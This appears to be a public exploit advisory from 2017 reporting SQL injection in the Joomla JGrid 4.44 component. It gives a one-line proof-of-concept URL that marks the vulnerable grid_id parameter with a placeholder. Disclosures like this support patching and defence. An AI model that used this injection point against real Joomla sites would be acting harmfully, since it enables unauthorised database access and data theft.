Joomla Component JGrid 4.44 - SQL Injection

Published
Credit
Risk
2017.05.01
Persian Hack Team
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes

# Exploit Title: Joomla Component JGrid 4.44 - SQL Injection
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
# Vendor Home : https://extensions.joomla.org/extensions/extension/core-enhancements/data-reports/jgrid/
# Home : http://persian-team.ir/
# Telegram Channel AND Demo: @PersianHackTeam
# Tested on: Linux
# Date: 2017-05-01

# POC :
# grid_id Parameter Vulnerable to SQL Injection:
http://www.target.comindex.php?option=com_jgrid&task=read_combo&controller=jgrid_documents&format=ajax&grid_id=[SQL]

# Greetz : T3NZOG4N & FireKernel And All Persian Hack Team Members
# Iranian White Hat Hackers


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com